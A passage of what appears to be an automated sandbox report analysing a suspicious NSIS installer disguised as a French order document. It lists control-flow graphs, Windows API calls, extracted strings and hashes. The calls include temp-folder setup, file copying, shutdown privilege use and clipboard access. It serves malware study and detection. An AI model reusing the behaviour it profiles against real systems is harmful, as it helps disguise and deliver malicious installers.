IsWindowVisible 4338->4340 4345 404f80 4338->4345 4341 404f53 4339->4341 4342 404faa 4339->4342 4340->4342 4344 404f76 4340->4344 4343 404018 SendMessageA 4341->4343 4346 404faf CallWindowProcA 4342->4346 4347 404f5d 4343->4347 4348 404894 5 API calls 4344->4348 4345->4346 4349 404914 4 API calls 4345->4349 4346->4347 4348->4345 4349->4342 3632 40173f 3633 4029fd 18 API calls 3632->3633 3634 401746 3633->3634 3635 401764 3634->3635 3636 40176c 3634->3636 3671 405cde lstrcpynA 3635->3671 3672 405cde lstrcpynA 3636->3672 3639 40176a 3643 405f49 5 API calls 3639->3643 3640 401777 3641 40576e 3 API calls 3640->3641 3642 40177d lstrcatA 3641->3642 3642->3639 3662 401789 3643->3662 3644 405fe2 2 API calls 3644->3662 3645 40594a 2 API calls 3645->3662 3647 4017a0 CompareFileTime 3647->3662 3648 401864 3649 404fc9 25 API calls 3648->3649 3651 40186e 3649->3651 3650 40183b 3652 404fc9 25 API calls 3650->3652 3669 401850 3650->3669 3654 402f1f 46 API calls 3651->3654 3652->3669 3653 405cde lstrcpynA 3653->3662 3655 401881 3654->3655 3656 401895 SetFileTime 3655->3656 3658 4018a7 FindCloseChangeNotification 3655->3658 3656->3658 3657 405d00 18 API calls 3657->3662 3659 4018b8 3658->3659 3658->3669 3660 4018d0 3659->3660 3661 4018bd 3659->3661 3664 405d00 18 API calls 3660->3664 3663 405d00 18 API calls 3661->3663 3662->3644 3662->3645 3662->3647 3662->3648 3662->3650 3662->3653 3662->3657 3665 4054f2 MessageBoxIndirectA 3662->3665 3670 40596f GetFileAttributesA CreateFileA 3662->3670 3666 4018c5 lstrcatA 3663->3666 3667 4018d8 3664->3667 3665->3662 3666->3667 3668 4054f2 MessageBoxIndirectA 3667->3668 3668->3669 3670->3662 3671->3639 3672->3640 4350 40163f 4351 4029fd 18 API calls 4350->4351 4352 401645 4351->4352 4353 405fe2 2 API calls 4352->4353 4354 40164b 4353->4354 4355 40193f 4356 4029e0 18 API calls 4355->4356 4357 401946 4356->4357 4358 4029e0 18 API calls 4357->4358 4359 401950 4358->4359 4360 4029fd 18 API calls 4359->4360 4361 401959 4360->4361 4362 40196c lstrlenA 4361->4362 4364 4019a7 4361->4364 4363 401976 4362->4363 4363->4364 4368 405cde lstrcpynA 4363->4368 4366 401990 4366->4364 4367 40199d lstrlenA 4366->4367 4367->4364 4368->4366

                                                        Executed Functions

                                                        Function 00403217 Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 324stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 406009 SHGetFileInfoA call 405cde GetCommandLineA call 405cde GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 405799 CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 15 4032d9-4032dd 12->15 16 4032df-4032e7 12->16 14 4033b1-4033cb GetTempPathA call 4031e3 13->14 25 403423-40343d DeleteFileA call 402c79 14->25 26 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 14->26 15->15 15->16 18 4032e9-4032ea 16->18 19 4032ef-4032f2 16->19 18->19 20 403384-403391 call 405799 19->20 21 4032f8-4032fc 19->21 20->11 40 403393 20->40 23 403314-403341 21->23 24 4032fe-403304 21->24 30 403343-403349 23->30 31 403354-403382 23->31 28 403306-403308 24->28 29 40330a 24->29 43 4034d1-4034e0 call 403675 OleUninitialize 25->43 44 403443-403449 25->44 26->25 42 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 26->42 28->23 28->29 29->23 35 40334b-40334d 30->35 36 40334f 30->36 31->20 38 4033a0-4033ac call 405cde 31->38 35->31 35->36 36->31 38->14 40->11 42->25 42->43 55 4034e6-4034f6 call 4054f2 ExitProcess 43->55 56 4035da-4035e0 43->56 47 4034c1-4034c8 call 403767 44->47 48 40344b-403456 call 405799 44->48 53 4034cd 47->53 57 403458-403481 48->57 58 40348c-403496 48->58 53->43 60 4035e2-4035ff call 406009 * 3 56->60 61 40365d-403665 56->61 63 403483-403485 57->63 66 403498-4034a5 call 40585c 58->66 67 4034fc-403516 lstrcatA lstrcmpiA 58->67 87 403601-403603 60->87 88 403649-403654 ExitWindowsEx 60->88 64 403667 61->64 65 40366b-40366f ExitProcess 61->65 63->58 70 403487-40348a 63->70 64->65 66->43 78 4034a7-4034bd call 405cde * 2 66->78 67->43 72 403518-40352d CreateDirectoryA SetCurrentDirectoryA 67->72 70->58 70->63 75 40353a-403562 call 405cde 72->75 76 40352f-403535 call 405cde 72->76 86 403568-403584 call 405d00 DeleteFileA 75->86 76->75 78->47 96 4035c5-4035cc 86->96 97 403586-403596 CopyFileA 86->97 87->88 93 403605-403607 87->93 88->61 91 403656-403658 call 40140b 88->91 91->61 93->88 98 403609-40361b GetCurrentProcess 93->98 96->86 100 4035ce-4035d5 call 405b92 96->100 97->96 99 403598-4035b8 call 405b92 call 405d00 call 405491 97->99 98->88 105 40361d-40363f 98->105 99->96 112 4035ba-4035c1 CloseHandle 99->112 100->43 105->88 112->96
                                                        APIs
                                                        • #17.COMCTL32 ref: 00403238
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                        • OleInitialize.OLE32(00000000), ref: 0040324A
                                                          • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                          • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                          • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        • SHGetFileInfoA.SHELL32(0041ECA0,00000000,?,00000160,00000000,00000008), ref: 00403272
                                                          • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Stedtillgs Setup,NSIS Error), ref: 00405CEB
                                                        • GetCommandLineA.KERNEL32(Stedtillgs Setup,NSIS Error), ref: 00403287
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000), ref: 0040329A
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000020), ref: 004032C5
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                        • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                        • OleUninitialize.OLE32(?), ref: 004034D6
                                                        • ExitProcess.KERNEL32 ref: 004034F6
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe",00000000,?), ref: 00403502
                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                        • DeleteFileA.KERNEL32(0041E8A0,0041E8A0,?,00424000,?), ref: 0040357A
                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,0041E8A0,00000001), ref: 0040358E
                                                        • CloseHandle.KERNEL32(00000000,0041E8A0,0041E8A0,?,0041E8A0,00000000), ref: 004035BB
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403610
                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0040364C
                                                        • ExitProcess.KERNEL32 ref: 0040366F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                        • String ID: "$"C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine$C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art$C:\Users\user\Desktop$C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Stedtillgs Setup$TEMP$TMP$\Temp$`K$v$~nsu.tmp
                                                        • API String ID: 4107622049-2175116634
                                                        • Opcode ID: f95dcb184bcfc731c638b0f0b02d50a914f8b1d791c92bb3e8b72eba762f1cc5
                                                        • Instruction ID: 10d5b1ce5ea8024dda8b9430cf8fc6ad938cae2f300cbf654cf654b9e6cc86b6
                                                        • Opcode Fuzzy Hash: f95dcb184bcfc731c638b0f0b02d50a914f8b1d791c92bb3e8b72eba762f1cc5
                                                        • Instruction Fuzzy Hash: 70B107706083517AE721AF619D89A2B7EACEB41706F04447FF541BA2D2C77C9E01CB6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405107 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 113 405107-405123 114 4052b4-4052ba 113->114 115 405129-4051f2 GetDlgItem * 3 call 404001 call 404867 GetClientRect GetSystemMetrics SendMessageA * 2 113->115 116 4052e4-4052f0 114->116 117 4052bc-4052de GetDlgItem CreateThread FindCloseChangeNotification 114->117 133 405210-405213 115->133 134 4051f4-40520e SendMessageA * 2 115->134 119 405312-405318 116->119 120 4052f2-4052f8 116->120 117->116 125 40531a-405320 119->125 126 40536d-405370 119->126 123 405333-40533a call 404033 120->123 124 4052fa-40530d ShowWindow * 2 call 404001 120->124 137 40533f-405343 123->137 124->119 130 405322-40532e call 403fa5 125->130 131 405346-405356 ShowWindow 125->131 126->123 128 405372-405378 126->128 128->123 135 40537a-40538d SendMessageA 128->135 130->123 138 405366-405368 call 403fa5 131->138 139 405358-405361 call 404fc9 131->139 141 405223-40523a call 403fcc 133->141 142 405215-405221 SendMessageA 133->142 134->133 143 405393-4053bf CreatePopupMenu call 405d00 AppendMenuA 135->143 144 40548a-40548c 135->144 138->126 139->138 152 405270-405291 GetDlgItem SendMessageA 141->152 153 40523c-405250 ShowWindow 141->153 142->141 150 4053c1-4053d1 GetWindowRect 143->150 151 4053d4-4053ea TrackPopupMenu 143->151 144->137 150->151 151->144 154 4053f0-40540a 151->154 152->144 157 405297-4052af SendMessageA * 2 152->157 155 405252-40525d ShowWindow 153->155 156 40525f 153->156 158 40540f-40542a SendMessageA 154->158 159 405265-40526b call 404001 155->159 156->159 157->144 158->158 160 40542c-40544c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 158->160 159->152 162 40544e-40546e SendMessageA 160->162 162->162 163 405470-405484 GlobalUnlock SetClipboardData CloseClipboard 162->163 163->144
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405167
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405176
                                                        • GetClientRect.USER32(?,?), ref: 004051B3
                                                        • GetSystemMetrics.USER32(00000015), ref: 004051BB
                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DC
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051ED
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405200
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040520E
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405221
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405243
                                                        • ShowWindow.USER32(?,00000008), ref: 00405257
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405278
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405288
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A1
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AD
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405185
                                                          • Part of subcall function 00404001: SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052C9
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000509B,00000000), ref: 004052D7
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004052DE
                                                        • ShowWindow.USER32(00000000), ref: 00405301
                                                        • ShowWindow.USER32(?,00000008), ref: 00405308
                                                        • ShowWindow.USER32(00000008), ref: 0040534E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405382
                                                        • CreatePopupMenu.USER32 ref: 00405393
                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053A8
                                                        • GetWindowRect.USER32(?,000000FF), ref: 004053C8
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E1
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541D
                                                        • OpenClipboard.USER32(00000000), ref: 0040542D
                                                        • EmptyClipboard.USER32 ref: 00405433
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543C
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405446
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545A
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405473
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040547E
                                                        • CloseClipboard.USER32 ref: 00405484
                                                        Strings
                                                        • Stedtillgs Setup: Completed, xrefs: 004053F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: Stedtillgs Setup: Completed
                                                        • API String ID: 4154960007-796908714
                                                        • Opcode ID: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                        • Instruction ID: 1ce46468062b4959d591950d49ef568145fe019f8889c876f185e2652ae6ab29
                                                        • Opcode Fuzzy Hash: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                        • Instruction Fuzzy Hash: AFA17A71900209BFDB219FA0DD89AAE7F79FB04345F10407AFA05B62A0C7B55E41DF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D00 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 409 405d00-405d0b 410 405d0d-405d1c 409->410 411 405d1e-405d33 409->411 410->411 412 405f26-405f2a 411->412 413 405d39-405d44 411->413 414 405f30-405f3a 412->414 415 405d56-405d60 412->415 413->412 416 405d4a-405d51 413->416 417 405f45-405f46 414->417 418 405f3c-405f40 call 405cde 414->418 415->414 419 405d66-405d6d 415->419 416->412 418->417 421 405d73-405da8 419->421 422 405f19 419->422 423 405ec3-405ec6 421->423 424 405dae-405db9 GetVersion 421->424 425 405f23-405f25 422->425 426 405f1b-405f21 422->426 427 405ef6-405ef9 423->427 428 405ec8-405ecb 423->428 429 405dd3 424->429 430 405dbb-405dbf 424->430 425->412 426->412 434 405f07-405f17 lstrlenA 427->434 435 405efb-405f02 call 405d00 427->435 431 405edb-405ee7 call 405cde 428->431 432 405ecd-405ed9 call 405c3c 428->432 433 405dda-405de1 429->433 430->429 436 405dc1-405dc5 430->436 447 405eec-405ef2 431->447 432->447 439 405de3-405de5 433->439 440 405de6-405de8 433->440 434->412 435->434 436->429 437 405dc7-405dcb 436->437 437->429 443 405dcd-405dd1 437->443 439->440 445 405e21-405e24 440->445 446 405dea-405e0d call 405bc5 440->446 443->433 450 405e34-405e37 445->450 451 405e26-405e32 GetSystemDirectoryA 445->451 457 405e13-405e1c call 405d00 446->457 458 405eaa-405eae 446->458 447->434 449 405ef4 447->449 453 405ebb-405ec1 call 405f49 449->453 455 405ea1-405ea3 450->455 456 405e39-405e47 GetWindowsDirectoryA 450->456 454 405ea5-405ea8 451->454 453->434 454->453 454->458 455->454 459 405e49-405e53 455->459 456->455 457->454 458->453 464 405eb0-405eb6 lstrcatA 458->464 461 405e55-405e58 459->461 462 405e6d-405e83 SHGetSpecialFolderLocation 459->462 461->462 466 405e5a-405e61 461->466 467 405e85-405e9c SHGetPathFromIDListA CoTaskMemFree 462->467 468 405e9e 462->468 464->453 470 405e69-405e6b 466->470 467->454 467->468 468->455 470->454 470->462
                                                        APIs
                                                        • GetVersion.KERNEL32(?,Completed,00000000,00405001,Completed,00000000), ref: 00405DB1
                                                        • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E2C
                                                        • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E3F
                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7B
                                                        • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 00405E89
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00405E94
                                                        • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB6
                                                        • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00405001,Completed,00000000), ref: 00405F08
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: .>e$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 900638850-1708131723
                                                        • Opcode ID: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                        • Instruction ID: 5b78479c63d7672d4d5e7177f0c07aa329b3d72ca06d4f46a7854d902b85ef7c
                                                        • Opcode Fuzzy Hash: 9c9f665194e8c5a47c6686974ba84a3b90d63e75829e45763daa2bd1b12ed63f
                                                        • Instruction Fuzzy Hash: B661F171A04A01ABEF205F24DC88BAF3B68EB15314F10813BE941B62D0D33D5A42DF9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004062B8 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 716 4062b8-4062bd 717 40632e-40634c 716->717 718 4062bf-4062ee 716->718 719 406924-406939 717->719 720 4062f0-4062f3 718->720 721 4062f5-4062f9 718->721 722 406953-406969 719->722 723 40693b-406951 719->723 724 406305-406308 720->724 725 406301 721->725 726 4062fb-4062ff 721->726 729 40696c-406973 722->729 723->729 727 406326-406329 724->727 728 40630a-406313 724->728 725->724 726->724 732 4064fb-406519 727->732 730 406315 728->730 731 406318-406324 728->731 733 406975-406979 729->733 734 40699a-4069a6 729->734 730->731 735 40638e-4063bc 731->735 739 406531-406543 732->739 740 40651b-40652f 732->740 736 406b28-406b32 733->736 737 40697f-406997 733->737 744 40613c-406145 734->744 742 4063d8-4063f2 735->742 743 4063be-4063d6 735->743 745 406b3e-406b51 736->745 737->734 741 406546-406550 739->741 740->741 747 406552 741->747 748 4064f3-4064f9 741->748 749 4063f5-4063ff 742->749 743->749 750 406b53 744->750 751 40614b 744->751 746 406b56-406b5a 745->746 752 406663-406670 747->752 753 4064ce-4064d2 747->753 748->732 754 406497-4064a1 748->754 759 406405 749->759 760 406376-40637c 749->760 750->746 755 406152-406156 751->755 756 406292-4062b3 751->756 757 4061f7-4061fb 751->757 758 406267-40626b 751->758 752->744 770 4066bf-4066ce 752->770 771 4064d8-4064f0 753->771 772 406ada-406ae4 753->772 766 406ae6-406af0 754->766 767 4064a7-4064c9 754->767 755->745 773 40615c-406169 755->773 756->719 764 406201-40621a 757->764 765 406aa7-406ab1 757->765 762 406271-406285 758->762 763 406ab6-406ac0 758->763 779 406ac2-406acc 759->779 780 40635b-406373 759->780 768 406382-406388 760->768 769 40642f-406435 760->769 778 406288-406290 762->778 763->745 777 40621d-406221 764->777 765->745 766->745 767->752 768->735 775 406493 768->775 769->775 776 406437-406455 769->776 770->719 771->748 772->745 773->750 774 40616f-4061b5 773->774 781 4061b7-4061bb 774->781 782 4061dd-4061df 774->782 775->754 783 406457-40646b 776->783 784 40646d-40647f 776->784 777->757 785 406223-406229 777->785 778->756 778->758 779->745 780->760 786 4061c6-4061d4 GlobalAlloc 781->786 787 4061bd-4061c0 GlobalFree 781->787 789 4061e1-4061eb 782->789 790 4061ed-4061f5 782->790 788 406482-40648c 783->788 784->788 791 406253-406265 785->791 792 40622b-406232 785->792 786->750 793 4061da 786->793 787->786 788->769 794 40648e 788->794 789->789 789->790 790->777 791->778 795 406234-406237 GlobalFree 792->795 796 40623d-40624d GlobalAlloc 792->796 793->782 798 406414-40642c 794->798 799 406ace-406ad8 794->799 795->796 796->750 796->791 798->769 799->745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                        • Instruction ID: 6e58a974b7539627981ffc7c5b29088a4c4f0515112d774f0dd61bb038518bac
                                                        • Opcode Fuzzy Hash: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                        • Instruction Fuzzy Hash: 8DF17770D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D7785A96CF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406009 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                        • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                        • String ID:
                                                        • API String ID: 310444273-0
                                                        • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                        • Instruction ID: 3e3a2605e63591ce59f726a843aae7ace037ed194313f5fe4a7956cb36b79068
                                                        • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                        • Instruction Fuzzy Hash: 4AE0CD3290412167C3109B749D44E3773ACAFD4751305483DF506F2150D734AC11E7AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405FE2 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
